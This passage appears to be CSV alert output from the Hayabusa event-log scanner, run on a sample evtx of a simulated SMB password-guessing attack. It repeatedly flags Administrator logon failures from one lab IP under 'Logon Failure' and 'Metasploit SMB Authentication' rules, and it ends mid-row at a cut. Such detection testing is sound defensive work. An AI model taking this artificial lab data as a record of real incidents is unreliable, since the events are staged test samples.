SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: 
